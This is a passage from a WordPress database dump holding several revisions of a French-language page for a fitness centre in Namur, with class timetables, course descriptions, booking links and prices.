corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 07:56:06', '2014-08-31 07:56:06', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(444, 1, '2014-08-31 07:58:24', '2014-08-31 07:58:24', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 07:58:24', '2014-08-31 07:58:24', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(443, 1, '2014-08-31 07:56:42', '2014-08-31 07:56:42', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\n\r\n&nbsp;\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 07:56:42', '2014-08-31 07:56:42', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(453, 1, '2014-08-31 08:32:13', '2014-08-31 08:32:13', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">15h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tpsychomot\">Psychomotricité</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">16h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcardio\">Cardio</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX/Cardio</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">Bootcamp</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\nCircuit Training : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\nCardio : Entraînement développant votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et pour perdre du poids (en complément avec un programme alimentaire) !\r\n\r\nTRX : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\nPsychomotricité : Séance réservée aux enfants de 3 à 6 ans.\r\n\r\nForce : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\nCore : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\nTRX/Cardio : Entraînement croisé entre le TRX et le cardio. Vous travaillerez ici votre endurance et votre renforcement musculaire global.\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:32:13', '2014-08-31 08:32:13', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(451, 1, '2014-08-31 08:19:09', '2014-08-31 08:19:09', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">15h30</td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tpsychomot\">Psychomotricité</td>\r\n<td class=\"tvide\"> - </td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">16h30</td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tvide\"> - </td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcardio\">Cardio</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">Bootcamp</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" 